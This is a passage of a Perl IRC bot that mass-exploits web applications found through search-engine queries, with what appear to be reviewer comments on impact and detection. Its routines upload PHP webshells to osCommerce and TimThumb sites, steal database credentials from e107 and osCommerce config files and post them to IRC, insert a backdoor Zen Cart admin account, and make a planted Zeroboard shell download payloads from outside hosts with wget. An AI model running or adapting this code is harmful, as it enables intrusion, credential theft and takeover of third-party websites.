&osql($chan,$site,$engine);
} else { }
# The sleep(2) after exit is never reached.
} exit; sleep(2); }
}
}
}

# osCommerce upload step (file_1 field): posts four multipart uploads to
# <url>?action=processuploads and then checks whether the uploaded files are
# served from images/.
#   $_[0] base URL   $_[1] IRC channel   $_[2] site   $_[3] engine label
# The local source files and remote filenames are the same as in the other
# upload steps (sonor.php, shure.php, cukz.php, detu.php).
sub osco_xpl2() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=processuploads";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['file_1' => ['./ewec.jpg' => 'sonor.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['file_1' => ['./ikal.jpg' => 'shure.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['file_1' => ['./lovie.jpg' => 'cukz.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['file_1' => ['./logi.jpg' => 'detu.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
# The four responses are stringified but never examined.
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
# Only the shure.php response is kept for the check below.
my $check = &get_content("http://".$site."images/shure.php");&get_content("http://".$site."images/cukz.php");&get_content("http://".$site."images/detu.php");sleep(3);
if ($check =~ /ZITH/) {
my $safe ="";
my $os ="";
my $free ="";
# NOTE(review): these patterns look truncated by page extraction; $soft is a
# package global that the report does not use.
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
# Reported to the scan channel and to the hard-coded $admin nick.
&msg("$chan","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
&msg("$admin","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
}
}

# Scan driver for the osCommerce banner-manager check: a site qualifies when
# the page at site+bug contains "TABLE_HEADING_BANNERS".
#   $_[0] IRC channel   $_[1] path appended to each site
#   $_[2] search query  $_[3] search engine label
# Qualifying sites are passed to all three upload steps and to osql().
sub osco3() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";
my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
# Double fork so the follow-up work runs detached from the scan loop.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_BANNERS/) {
&msg("$chan","$oscologo 3$engine 11checking... 7 ".$test);
&osco_xpl3($test,$chan,$site,$engine);
&osco_xpl2($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
# The sleep(2) after exit is never reached.
} exit; sleep(2); }
}
}
}
# osCommerce upload step (banners_image field): posts four multipart uploads
# to <url>?action=insert and then checks whether the uploaded files are
# served from images/.
#   $_[0] base URL   $_[1] IRC channel   $_[2] site   $_[3] engine label
# The local source files and remote filenames are the same as in the other
# upload steps (sonor.php, shure.php, cukz.php, detu.php).
sub osco_xpl3() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=insert";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['banners_image' => ['./ewec.jpg' => 'sonor.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['banners_image' => ['./ikal.jpg' => 'shure.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['banners_image' => ['./lovie.jpg' => 'cukz.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['banners_image' => ['./logi.jpg' => 'detu.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
# The four responses are stringified but never examined.
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
# Only the shure.php response is kept for the check below.
my $check = &get_content("http://".$site."images/shure.php");&get_content("http://".$site."images/cukz.php");&get_content("http://".$site."images/detu.php");sleep(3);
if ($check =~ /ZITH/) {
my $safe ="";
my $os ="";
my $free ="";
# NOTE(review): these patterns look truncated by page extraction; $soft is a
# package global that the report does not use.
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
# Reported to the scan channel and to the hard-coded $admin nick.
&msg("$chan","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
&msg("$admin","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
}
}
# Requests the osCommerce file manager's download action for
# /includes/configure.php and, if the response contains "http://", passes the
# URL to osql_xpl() (defined outside this section).
#   $_[0] IRC channel   $_[1] site   $_[2] engine label (unused here)
# Impact: configure.php holds the store's database settings, so a successful
# download should be treated as a credential disclosure and the credentials
# rotated.
sub osql() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
my $re = &get_content($test);
# A loose check: any "http://" in the body counts as a hit.
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
# Scan driver that applies the configure.php download check from osql() to
# every site returned by search_engine().
#   $_[0] IRC channel   $_[1] path (passed to search_engine only)
#   $_[2] search query  $_[3] search engine label
# $ossqllogo is a file-level variable that is not visible in this section.
# Unlike the other scan drivers this one does not fork; each site is checked
# inline.
sub oscoQ() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$ossqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$ossqllogo 4$engine 0 Scan finish"); }
my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
my $re = &get_content($test);
# Any "http://" in the body counts as a hit.
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
}
}

# Requests e107_plugins/my_gallery/image.php with a file parameter that
# climbs two directories to e107_config.php and, if the response contains
# "http://", passes the URL to osql_xpl() (defined outside this section).
#   $_[0] IRC channel   $_[1] site   $_[2] engine label (unused here)
# Detection: "../" sequences in the file parameter of image.php.
# Impact: e107_config.php holds database settings, so a hit is a credential
# disclosure.
sub e107xpl1() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}

# Scan driver that applies the my_gallery/image.php config-file read to every
# site returned by search_engine() and hands hits to e107_cuk().
#   $_[0] IRC channel   $_[1] path (passed to search_engine only)
#   $_[2] search query  $_[3] search engine label
# $e107logosql is a file-level variable that is not visible in this section.
sub e107xpl() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logosql);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$e107logosql 4$engine 0 Scan finish"); }
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
my $re = &get_content($test);
# Any "http://" in the body counts as a hit.
if ($re =~ /http:\/\//){
# &msg("$chan","$e107logosql 4$engine 9checking.. 11 ".$test);
&e107_cuk($test,$chan,$site);
}
}
}
}
# Fetches $url and, on a successful response, extracts the four e107 database
# settings (server, user, password, default database) with regexes and posts
# each one to the IRC channel.
#   $_[0] URL to fetch   $_[1] IRC channel   $_[2] site (for the report text)
# Impact: the credentials are sent in clear text to the channel, so any
# site that answered this request should rotate its database password.
sub e107_cuk() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $request = HTTP::Request->new(GET=>$url);
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
my $response = $browser->request($request);
if ($response->is_success) {
# as_string includes the status line and headers as well as the body.
my $res = $response->as_string;
# Each pattern uses a greedy (.*) up to the last quote on the line, and /g
# in scalar context, so successive matches on $res advance from the previous
# match position.
if ($res =~ m/mySQLserver = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB Server: 3 $1");
}
if ($res =~ m/mySQLuser = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB username: 3 $1");
}
if ($res =~ m/mySQLpassword = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB password: 3 $1");
}
if ($res =~ m/mySQLdefaultdb = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB database: 3 $1");
}
}
}
# Scan driver for the phpMyAdmin check: requests
# phpMyAdmin/config/config.inc.php?c=id on every site returned by
# search_engine() and reports sites whose response matches $adm_output.
#   $_[0] IRC channel   $_[1] path (passed to search_engine only)
#   $_[2] search query  $_[3] search engine label
# $admlogo and $adm_output are file-level variables not visible in this
# section.
# NOTE(review): a config.inc.php that reacts to a "c" query parameter looks
# like a check for an already-planted file rather than for stock phpMyAdmin
# behaviour. Confirm against the rest of the sample.
# Detection: requests to config/config.inc.php carrying a "c" parameter.
sub adm() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$admlogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$admlogo 4$engine 0 Scan finish"); }
my $test = "http://".$site."phpMyAdmin/config/config.inc.php?c=id";
my $vuln = "http://".$site."phpMyAdmin/config/config.inc.php?c=";
my $re = &get_content($test);
# $adm_output is interpolated into the regex unescaped.
if ($re =~ /$adm_output/){
&msg("$chan", "$admlogo(4@3$engine15)(4@13VulN15)13 ".$vuln."15(4@0OKE15)");
}
}
}
}

# Scan driver for an exposed FCKeditor file-manager connector: requests
# site+$open_test on every site returned by search_engine() and reports sites
# whose response matches $open_output.
#   $_[0] IRC channel   $_[1] path (passed to search_engine only)
#   $_[2] search query  $_[3] search engine label
# $oplogo, $open_test and $open_output are file-level variables not visible
# in this section.
# Mitigation: the reported URL is the editor's connector test page under
# admin/view/javascript/fckeditor/. Removing the bundled connector test pages
# and restricting the admin path closes this check.
sub op() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oplogo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$open_test;
my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
my $re = &get_content($test);
# $open_output is interpolated into the regex unescaped.
if ($re =~ /$open_output/){
&msg("$chan", "$oplogo(4@3$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
}
}
}
}

# Scan driver for the Zen Cart sqlpatch check: requests
# admin/sqlpatch.php/password_forgotten.php?action=execute on every site
# returned by search_engine() and passes sites whose response contains
# "zc_install" to zen_query().
#   $_[0] IRC channel   $_[1] path (passed to search_engine only)
#   $_[2] search query  $_[3] search engine label
# $zenlogo is a file-level variable not visible in this section.
# Detection: any request for admin/sqlpatch.php with extra path info appended.
sub zen() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$zenlogo 4$engine 0 Scan finish"); }
my $test = "http://".$site."admin/sqlpatch.php/password_forgotten.php?action=execute";
my $html = &get_content($test);
if ($html =~ /zc_install/){
&zen_query($chan,$site,$test);
}
}
}
}
# Posts a fixed SQL statement to the Zen Cart sqlpatch URL in $test; the
# statement inserts an administrator row. The outcome is reported to the scan
# channel and to $admin.
#   $_[0] IRC channel   $_[1] site (for the report text)   $_[2] URL to POST to
# Indicators for incident response, all taken from the statement below: a row
# in the admin table with admin_id 2283, admin_name 'abc' and admin_email
# 'localhost'. A site matching the "Duplicate entry" branch already had that
# row before this request.
sub zen_query() {
my $chan = $_[0];
my $url = $_[1];
my $test = $_[2];
my $code = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (2283,'abc','localhost','617ec22fbb8f201c366e9848c0eb6925:87');";
my $req = HTTP::Request->new(POST => $test);
$req->content_type("application/x-www-form-urlencoded");
# The statement is appended without URL-encoding.
$req->content("query_string=".$code);
# $uagent is a file-level variable not visible in this section.
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(3);
my $res = $ua->request($req);
my $data = $res->as_string;
# "1 statements processed" is taken as confirmation that the insert ran.
if ( $data =~ /1 statements processed/i ) {
&msg("$chan","$zenlogo(4@9VulN15)3 http://".$url."4admin/login.php 15(4@9user15)0 abc 15(4@9pass15)0 wew");
&msg("$admin","$zenlogo(4@9VulN15)3 http://".$url."4admin/login.php 15(4@9user15)0 abc 15(4@9pass15)0 wew");
}
# "Duplicate entry" means the row with that admin_id already exists.
elsif ( $data =~ /Duplicate entry/ ) {
&msg("$chan","$zenlogo(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 abc 15(4@9pass15)10 wew");
&msg("$admin","$zenlogo(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 abc 15(4@9pass15)10 wew");
}
}

######################################### Zeroboard scanner #######
sub zboard() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$zerologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$zerologo 4$engine 0 Scan finish"); }
my $reslx = "http://".$site.$bug;
my $crot = &get_content($reslx);

if ($crot =~ /Zeroboard/) {
my $sc = system("./zero $reslx 80");sleep(2);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = &get_content("http://".$site."/data/shell.php");
if ($check =~ /Cannot execute a blank command/) {
my $dark = &get_content("http://".$site."/data/shell.php?cmd=uname%20-a");
&msg("$chan","$zerologo 4$engine 11Checking... http://".$site."/data/shell.php?cmd=uname%20-a Uname: $dark");
my $bxx = &get_content("http://".$site."/data/shell.php?cmd=lwp-download%20http://www.daisychainwiltshire.co.uk/images/ewec.jpg;mv%ewec.jpg%20dede.php;wget%20http://www.daisychainwiltshire.co.uk/images/ewec.jpg;mv%ewec.jpg%20dede.php;wget%20http://www.daisychainwiltshire.co.uk/images/ewec.jpg;mv%ewec.jpg%20dede.php");
my $bx1 = &get_content("http://".$site."/data/shell.php?cmd=lwp-download http://174.142.75.147/~ajeterb/images/ewec.php;mv%20ewec.txt%20bs.php;wget http://174.142.75.147/~ajeterb/images/ewec.php;mv%20ewec.txt%20ewec.php");
my $bxc = &get_content("http://".$site."/data/ewec.php");
my $vuln1 = "http://".$site."/data/dede.php";
my $vuln2 = "http://".$site."/bbs//data/dede.php";
my $vuln3 = "http://".$site."/zero_board/data/dede.php";
my $vuln4 = "http://".$site."/zb41/data/dede.php";
my $vuln5 = "http://".$site."/zb/data/dede.php";
my $vuln6 = "http://".$site."/board2/data/dede.php";
my $vuln7 = "http://".$site."/zboard//data/dede.php";
my $vuln8 = "http://".$site."/zeroboard//data/dede.php";
my $vuln9 = "http://".$site."/board//data/dede.php";

my $check = &get_content($vuln1);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(@$engine)(@Vuln klo ga salah) ".$vuln1." (@SafeMode= $safe)(@OS= $os)(@FreeSpace= $free)");sleep(2);
&msg("$admin","$zerologo(@$engine)(@Vuln klo ga salah) ".$vuln1." (@SafeMode= $safe)(@OS= $os)(@FreeSpace= $free)");sleep(2);
}
}
else {
my $check = &get_content($vuln2);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln2." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln2." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln3);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln3." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln3." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln4);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln4." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln4." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln5);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln5." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln5." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln6);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln6." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln6." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln7);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln7." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln7." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln8);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln8." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln8." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}

my $check = &get_content($vuln9);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln9." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
&msg("$admin","$zerologo(4@3$engine15)15(4@3Vuln klo ga salah15)13 ".$vuln9." 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
}
}exit;

}
}
}
}
}
}
######################################### Scanner TIMTHUMB #############################

sub thumb() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$thumblogo 8$engine 0Scan finish 15"); }
my $path = dirname($bug)."/";
my $xpl = "http://".$site.$bug."?src=".$thumbshell;
my $vuln1 = "http://".$site."0".$path."0cache/external_6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln2 = "http://".$site."0".$path."0cache/6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln3 = "http://".$site."0".$path."0temp/external_6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln4 = "http://".$site."0".$path."0temp/6563500d8e4c55f35a683f8b2ab6289b.php";
my $vuln5 = "http://".$site."0".$path."0wp-content/uploads/thumb-temp/6563500d8e4c55f35a683f8b2ab6289b.php";
my $html = get_content($xpl);
if ($html =~ /cache\/external_6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."cache/external_6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
my $spread = get_content('http://'.$site.$path."cache/external_6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
sleep(3);
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln1."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /cache\/6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."cache/6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
sleep(3);
my $spread = get_content("http://".$site.$path."cache/6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln2."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /temp\/external_6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."temp/external_6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
my $spread = get_content("http://".$site.$path."temp/external_6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln3."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /temp\/6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."temp/6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
sleep(3);
my $spread = get_content("http://".$site.$path."temp/6563500d8e4c55f35a683f8b2ab6289b.php?pnt");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln4."?amg 15");
}
else {
}
} exit; } sleep(3);
}
elsif ($html =~ /wp-content\/uploads\/thumb-temp\/6563500d8e4c55f35a683f8b2ab6289b/ && $html !~ /can not be created/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = get_content("http://".$site.$path."wp-content/uploads/thumb-temp/6563500d8e4c55f35a683f8b2ab6289b.php?");
if ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
sleep(3);
my $spread = get_content("http://".$site.$path."wp-content/uploads/thumb-temp/6563500d8e4c55f35a683f8b2ab6289b.php?");
$spread = "";
}
elsif ($check =~ /GIF89a/i) {
my $sys = $1;
&msg("$admin","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
&msg("$chan","$thumblogo(8$engine15)8 ".$vuln5."?amg 15");
sleep(3);
}
else {
}
} exit; } sleep(3);
}
}
}
}

#####################################################
# Scan driver for exposed configuration files: requests site+bug on every
# site returned by search_engine(); when the response contains "db_host" it
# extracts the database username and password with getUserPass(), posts them
# to the channel, and then tries the same pair against the site's FTP service
# via ftp_connect().
#   $_[0] IRC channel   $_[1] path appended to each site
#   $_[2] search query  $_[3] search engine label
# $whmlogo is a file-level variable not visible in this section.
# Impact: this is a credential-reuse check. A leaked database password that
# is also the hosting account password gives file-level access, so the two
# should never be the same and a leaked value should be rotated everywhere.
sub whm() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$whmlogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$whmlogo 4$engine 0 Scan finish"); }
my $test1 = "http://".$site.$bug;
my $html = get_content($test1);
